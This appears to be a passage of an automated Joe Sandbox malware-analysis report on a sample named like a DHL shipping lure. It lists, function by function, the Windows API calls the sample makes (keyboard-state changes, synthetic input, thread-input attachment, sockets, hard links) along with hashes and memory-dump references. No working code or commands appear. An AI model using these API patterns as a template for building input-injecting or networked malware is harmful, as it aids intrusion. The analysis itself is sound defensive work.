                                                                                            • Instruction ID: add53ead10c23e86a62bba4ef2b7fdd734e3f57d9fddd09e803bbc8252bc488c
                                                                                            • Opcode Fuzzy Hash: 27a2bd5f7235354bda5fcf49e570d3f834f32b869e0f9f4d7df9ebaf5c5707b6
                                                                                            • Instruction Fuzzy Hash: A7314F71A00119AFDB10DF58C885EAA7BF8FF44308F1440A5F505EB252D771ED46CB61
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008B424F
                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008B4264
                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008B4271
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: msctls_trackbar32
                                                                                            • API String ID: 3850602802-1010561917
                                                                                            • Opcode ID: 83b5ad6f484ef93b7ef1da41fea95d560f311a945cbf8664b9de0d8b5d92276e
                                                                                            • Instruction ID: 66a234cac0111ecd3781cbb175ede4ae33041ad85c9263195741122d2eacf367
                                                                                            • Opcode Fuzzy Hash: 83b5ad6f484ef93b7ef1da41fea95d560f311a945cbf8664b9de0d8b5d92276e
                                                                                            • Instruction Fuzzy Hash: CE11E331240248BEEF205E29CC06FEB3BACFF95B54F110124FA55E2191D271DC519B50
                                                                                            APIs
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                              • Part of subcall function 00882DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00882DC5
                                                                                              • Part of subcall function 00882DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00882DD6
                                                                                              • Part of subcall function 00882DA7: GetCurrentThreadId.KERNEL32 ref: 00882DDD
                                                                                              • Part of subcall function 00882DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00882DE4
                                                                                            • GetFocus.USER32 ref: 00882F78
                                                                                              • Part of subcall function 00882DEE: GetParent.USER32(00000000), ref: 00882DF9
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00882FC3
                                                                                            • EnumChildWindows.USER32(?,0088303B), ref: 00882FEB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                            • String ID: %s%d
                                                                                            • API String ID: 1272988791-1110647743
                                                                                            • Opcode ID: 71ef9bb42f3881abf8525d39eb94674f11e97bcc5d419cfcfd7c41fdea7f35b2
                                                                                            • Instruction ID: d256d60ecd7f94594a991b791ece58c5b944e98d3dd8cdde36c915c698f4cda1
                                                                                            • Opcode Fuzzy Hash: 71ef9bb42f3881abf8525d39eb94674f11e97bcc5d419cfcfd7c41fdea7f35b2
                                                                                            • Instruction Fuzzy Hash: B711E1716002096BCF107F789C85EEE3B6AFF94314F044079F909EB292EE3099498B71
                                                                                            APIs
                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008B58C1
                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008B58EE
                                                                                            • DrawMenuBar.USER32(?), ref: 008B58FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                            • String ID: 0
                                                                                            • API String ID: 3227129158-4108050209
                                                                                            • Opcode ID: 8882f5394503ecfa775e74f5a60b9dd8c5bea1921ff0b94b8c2e83d6f41ca7e2
                                                                                            • Instruction ID: d0c607240c316fc33d11d3fdb94c2066d99eb69f1250cb732d6d3aeef08256eb
                                                                                            • Opcode Fuzzy Hash: 8882f5394503ecfa775e74f5a60b9dd8c5bea1921ff0b94b8c2e83d6f41ca7e2
                                                                                            • Instruction Fuzzy Hash: 62016D31500218EFDB219F15EC44BEEBBB4FF45364F1480AAF949DA261DB308A84DF61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9085167329cddac9def75ec416aae69377ac367d5adfe28254af1560d4f7f4fc
                                                                                            • Instruction ID: 97beef80d0d67a8697d3df95a2c9dbb87790bdb322295f81596c1ba7affa3187
                                                                                            • Opcode Fuzzy Hash: 9085167329cddac9def75ec416aae69377ac367d5adfe28254af1560d4f7f4fc
                                                                                            • Instruction Fuzzy Hash: 62C17B75A0020AEFDB54DFA8C898AAEB7B5FF48314F208598E505EB251C771EE45CF90
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: __alldvrm$_strrchr
                                                                                            • String ID:
                                                                                            • API String ID: 1036877536-0
                                                                                            • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                            • Instruction ID: 63a63611879a16d14e5bebd5b67a5cdd269d55f8c1d5826fcaf0c884007a538e
                                                                                            • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                            • Instruction Fuzzy Hash: F9A16872D00B869FDB11CF18C8817AEBBE4FF61399F28416DE985DB282C6348989C751
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInitInitializeUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 1998397398-0
                                                                                            • Opcode ID: ef4645c02a88cc4143b27be77986e35f7282d4f48c3cb5cb8f9bc3bf89c349ac
                                                                                            • Instruction ID: f26c6da685fd9965d3a8c9739618e6e5dd4b9df45afdd861dc0e743d8a0d4135
                                                                                            • Opcode Fuzzy Hash: ef4645c02a88cc4143b27be77986e35f7282d4f48c3cb5cb8f9bc3bf89c349ac
                                                                                            • Instruction Fuzzy Hash: 78A16A756043109FDB00DF28C585A2AB7E5FF89714F048859F98AEB762DB70EE41CB92
                                                                                            APIs
                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,008BFC08,?), ref: 008805F0
                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,008BFC08,?), ref: 00880608
                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,008BCC40,000000FF,?,00000000,00000800,00000000,?,008BFC08,?), ref: 0088062D
                                                                                            • _memcmp.LIBVCRUNTIME ref: 0088064E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 314563124-0
                                                                                            • Opcode ID: 43b8ac51efbd5c4e0560e77aafaba2938217317e5088bc1fd53988154cea1261
                                                                                            • Instruction ID: 0a24f7332a2419ff640b54d584e3e12f3edf44d0139e4acd909441dc65790732
                                                                                            • Opcode Fuzzy Hash: 43b8ac51efbd5c4e0560e77aafaba2938217317e5088bc1fd53988154cea1261
                                                                                            • Instruction Fuzzy Hash: F881E971A00209AFCB44DF94C984DEEB7B9FF89315F204558E516EB250DB71AE4ACF60
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: cecdf6b9eb4b047c8a44753dca5cd099e1df86513180a7bfbd591680ca6ca00d
                                                                                            • Instruction ID: 461ec45e861bedc0956a0550b147e67523cd6314103a700e77da4fc5825e9221
                                                                                            • Opcode Fuzzy Hash: cecdf6b9eb4b047c8a44753dca5cd099e1df86513180a7bfbd591680ca6ca00d
                                                                                            • Instruction Fuzzy Hash: 31411B31A00115ABDF216BBD8C4EABE3AA6FF41370F1E4225F919D7293EE7488415367
                                                                                            APIs
                                                                                            • GetWindowRect.USER32(00B413F0,?), ref: 008B62E2
                                                                                            • ScreenToClient.USER32(?,?), ref: 008B6315
                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 008B6382
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3880355969-0
                                                                                            • Opcode ID: 5489c915ffaa0b7f0cece7239c2dc839d49da8a3a27ad2938e2f9b25b678f1e3
                                                                                            • Instruction ID: a4d3ce094bc08ba82370d565a0ba9bf5c0343f3ae17efbd1c7f9b9111748e2b6
                                                                                            • Opcode Fuzzy Hash: 5489c915ffaa0b7f0cece7239c2dc839d49da8a3a27ad2938e2f9b25b678f1e3
                                                                                            • Instruction Fuzzy Hash: 35511774A00209EFDB10DF68D8849AE7BB5FB59360F108269F915DB3A0E774AD91CB90
                                                                                            APIs
                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 008A1AFD
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A1B0B
                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 008A1B8A
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A1B94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$socket
                                                                                            • String ID:
                                                                                            • API String ID: 1881357543-0
                                                                                            • Opcode ID: 54468ef96a3ac8715a43fbc16aec73448b1fbb2b03abfa43d26815667071358c
                                                                                            • Instruction ID: 609f34dc537c3c4d6b756774400e204ca66a8b7cc8d1d24f2da2592ea2f3d628
                                                                                            • Opcode Fuzzy Hash: 54468ef96a3ac8715a43fbc16aec73448b1fbb2b03abfa43d26815667071358c
                                                                                            • Instruction Fuzzy Hash: 9D41A134600210AFEB20AF28D88AF2977E5FB45718F548458F91ADF7D2D772DD828B91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c6d93ff2aab919c7b81b877015beecad5241ed2ca17f7365eeec202a97c07068
                                                                                            • Instruction ID: 600cebab1bdbe825ef17118a3b5e14019eb932e2c1d40ab6265db895d3e3d5a2
                                                                                            • Opcode Fuzzy Hash: c6d93ff2aab919c7b81b877015beecad5241ed2ca17f7365eeec202a97c07068
                                                                                            • Instruction Fuzzy Hash: 3A410672A00318AFD7249F7CCC41B6ABBA9FB98711F20452EF941DB282D771D9098781
                                                                                            APIs
                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00895783
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 008957A9
                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008957CE
                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008957FA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 3321077145-0
                                                                                            • Opcode ID: 43d9b0e79f323759a6dce83b3c97c6efaa0f443a24b3807edc42541edb0ce797
                                                                                            • Instruction ID: 1be55461fd3fa460a8e95add50c46ac12ea301b04482acea6fb774b006c728e9
                                                                                            • Opcode Fuzzy Hash: 43d9b0e79f323759a6dce83b3c97c6efaa0f443a24b3807edc42541edb0ce797
                                                                                            • Instruction Fuzzy Hash: 9F41EE35600610DFCB11EF59D545A5EBBE1FF89720B198498E84AAB362CB34FD41CB92
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00846D71,00000000,00000000,008482D9,?,008482D9,?,00000001,00846D71,8BE85006,00000001,008482D9,008482D9), ref: 0085D910
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085D999
                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0085D9AB
                                                                                            • __freea.LIBCMT ref: 0085D9B4
                                                                                              • Part of subcall function 00853820: RtlAllocateHeap.NTDLL(00000000,?,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6,?,00821129), ref: 00853852
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                            • String ID:
                                                                                            • API String ID: 2652629310-0
                                                                                            • Opcode ID: 7df73daeec36bc5a9d7659ad8a6fd9a38b5d44cbdf75567d2249e79387570d77
                                                                                            • Instruction ID: 2b5fe8af29625cea84a48777520537c99dc8c913a5a8532a7cc63428d7c28600
                                                                                            • Opcode Fuzzy Hash: 7df73daeec36bc5a9d7659ad8a6fd9a38b5d44cbdf75567d2249e79387570d77
                                                                                            • Instruction Fuzzy Hash: 5A31B072A0020AABDF24DF69DC45EAE7FA5FB41311B054268FC04EB251EB35CD59CB91
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 008B5352
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B5375
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008B5382
                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008B53A8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 3340791633-0
                                                                                            • Opcode ID: 3c84b0b417d6e09e3286f09a87673f99367382deae8d14d401319ff7872f4eb0
                                                                                            • Instruction ID: f0300fd892880ef7a98d97b13c5bd26cf0234e3c0b0128c90360a3908f9d6e03
                                                                                            • Opcode Fuzzy Hash: 3c84b0b417d6e09e3286f09a87673f99367382deae8d14d401319ff7872f4eb0
                                                                                            • Instruction Fuzzy Hash: AD319E34A55A0CEFEB309A14CC55FE977E5FB0E390F584102BA11D63E1C7B5A9809B52
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0088ABF1
                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 0088AC0D
                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 0088AC74
                                                                                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0088ACC6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                            • String ID:
                                                                                            • API String ID: 432972143-0
                                                                                            • Opcode ID: f15e64a07d736e7e4dc65a548028dfb294c5ef3a32e493dac38c5829b4ec079d
                                                                                            • Instruction ID: ee4283295170c4ace7978267ea78aad2518f7cf72f291125d941fa5f74e83b54
                                                                                            • Opcode Fuzzy Hash: f15e64a07d736e7e4dc65a548028dfb294c5ef3a32e493dac38c5829b4ec079d
                                                                                            • Instruction Fuzzy Hash: 8731F470A40618AFFB39AB69C804BFA7BA7FB89310F08431BE485E21D1C37599858752
                                                                                            APIs
                                                                                            • ClientToScreen.USER32(?,?), ref: 008B769A
                                                                                            • GetWindowRect.USER32(?,?), ref: 008B7710
                                                                                            • PtInRect.USER32(?,?,008B8B89), ref: 008B7720
                                                                                            • MessageBeep.USER32(00000000), ref: 008B778C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1352109105-0
                                                                                            • Opcode ID: c45055e7863b4f01507cb4944725e14525a1d8a32594a8a1aeaad75162d76109
                                                                                            • Instruction ID: b57d631b1348e9600e345803998ee89deef4bd6b187af3fe26bcee1ddffe6ee7
                                                                                            • Opcode Fuzzy Hash: c45055e7863b4f01507cb4944725e14525a1d8a32594a8a1aeaad75162d76109
                                                                                            • Instruction Fuzzy Hash: 11418934A09354DFDB11CF68C898EE9BBF4FB99304F1541A8E815DB361CB70A941CB90
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32 ref: 008B16EB
                                                                                              • Part of subcall function 00883A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00883A57
                                                                                              • Part of subcall function 00883A3D: GetCurrentThreadId.KERNEL32 ref: 00883A5E
                                                                                              • Part of subcall function 00883A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008825B3), ref: 00883A65
                                                                                            • GetCaretPos.USER32(?), ref: 008B16FF
                                                                                            • ClientToScreen.USER32(00000000,?), ref: 008B174C
                                                                                            • GetForegroundWindow.USER32 ref: 008B1752
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
